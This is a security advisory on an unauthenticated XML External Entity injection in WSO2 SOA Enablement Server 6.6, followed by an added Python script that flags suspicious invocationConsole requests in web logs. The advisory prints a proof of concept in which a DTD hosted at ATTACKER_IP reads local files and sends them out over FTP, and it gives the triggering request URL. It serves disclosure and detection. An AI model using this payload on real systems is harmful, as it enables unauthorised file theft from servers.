WSO2 SOA Enablement Server XML External Entity Injection

2016-07-13T00:00:00
ID PACKETSTORM:137887
Type packetstorm
Reporter Jakub Palaczynski
Modified 2016-07-13T00:00:00

Description

                                        
Title: WSO2 SOA Enablement Server - XML External Entity Injection  
Authors: Pawel Gocyla, Jakub Palaczynski  
Date: 08. June 2016  
  
Affected Software:  
==================  
WSO2 SOA Enablement Server for Java/6.6 build SSJ-6.6-20090827-1616  
Probably other versions are also vulnerable.  
  
  
Vulnerability:  
**************  
  
XML External Entity Injection:  
==============================  
  
It must be noted that this vulnerability is exploitable without  
authentication.  
  
Proof of Concept:  
1. An attacker sets up a web server that serves two files (wsdl.txt and  
file.dtd):  
wsdl.txt:  
<?xml version="1.0" encoding="utf-8"?>  
<!DOCTYPE m [ <!ENTITY % remote SYSTEM "http://ATTACKER_IP/file.dtd">%remote;%int;%trick;]>  
file.dtd:  
<!ENTITY % payl SYSTEM "file:///C:/">  
<!ENTITY % int "<!ENTITY % trick SYSTEM 'ftp://ATTACKER_IP/%payl;'>">  
  
2. An attacker sets up an FTP server that logs every command executed on the  
server.  
  
3. An attacker sends a request that triggers the vulnerability:  
https://WSO2SOA_IP:6443/invocationConsole?p.wsdlUrl=http://attacker_ip/wsdl.txt  
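
A detection sketch for the request in step 3, added here as an example and not part of the original advisory: it scans web access log lines for invocationConsole requests whose p.wsdlUrl parameter points at a host outside an allow-list. The Combined Log Format, the trusted host names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: the front-end access log uses Common/Combined Log Format.
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')

# Assumption: hosts from which WSDL files are legitimately loaded (constructed).
TRUSTED_WSDL_HOSTS = {"wsdl.corp.example", "10.0.5.20"}

# Constructed sample log lines (documentation address ranges only).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Jul/2016:10:00:01 +0000] "GET /invocationConsole?p.wsdlUrl=http://wsdl.corp.example/orders.wsdl HTTP/1.1" 200 5120',
    '203.0.113.7 - - [13/Jul/2016:10:02:44 +0000] "GET /invocationConsole?p.wsdlUrl=http://198.51.100.23/wsdl.txt HTTP/1.1" 200 312',
    '203.0.113.7 - - [13/Jul/2016:10:03:10 +0000] "GET /invocationConsole?p.wsdlUrl=http%3A%2F%2F198.51.100.23%2Fwsdl.txt HTTP/1.1" 200 312',
    '192.0.2.11 - - [13/Jul/2016:10:05:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
]


def find_external_wsdl_requests(lines, trusted_hosts=TRUSTED_WSDL_HOSTS):
    """Return (client, wsdl_url) for each invocationConsole request whose
    p.wsdlUrl value names a host that is not in trusted_hosts."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        target = urlsplit(m.group("target"))
        if not target.path.lower().rstrip("/").endswith("/invocationconsole"):
            continue
        # parse_qsl percent-decodes values, so an encoded URL is still caught.
        for key, value in parse_qsl(target.query):
            if key.lower() != "p.wsdlurl":
                continue
            # URLs without a host (for example file:) yield "" and are flagged.
            host = (urlsplit(value).hostname or "").lower()
            if host not in trusted_hosts:
                findings.append((m.group("client"), value))
    return findings


if __name__ == "__main__":
    for client, url in find_external_wsdl_requests(SAMPLE_LOG):
        print(f"external WSDL fetch requested by {client}: {url}")
```
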
  
  
FIX:  
====  
  
Patches were already released by the vendor.  
  
Contact:  
========  
  
pawellgocyla[at]gmail[dot]com  
jakub.palaczynski[at]gmail[dot]com  
  
  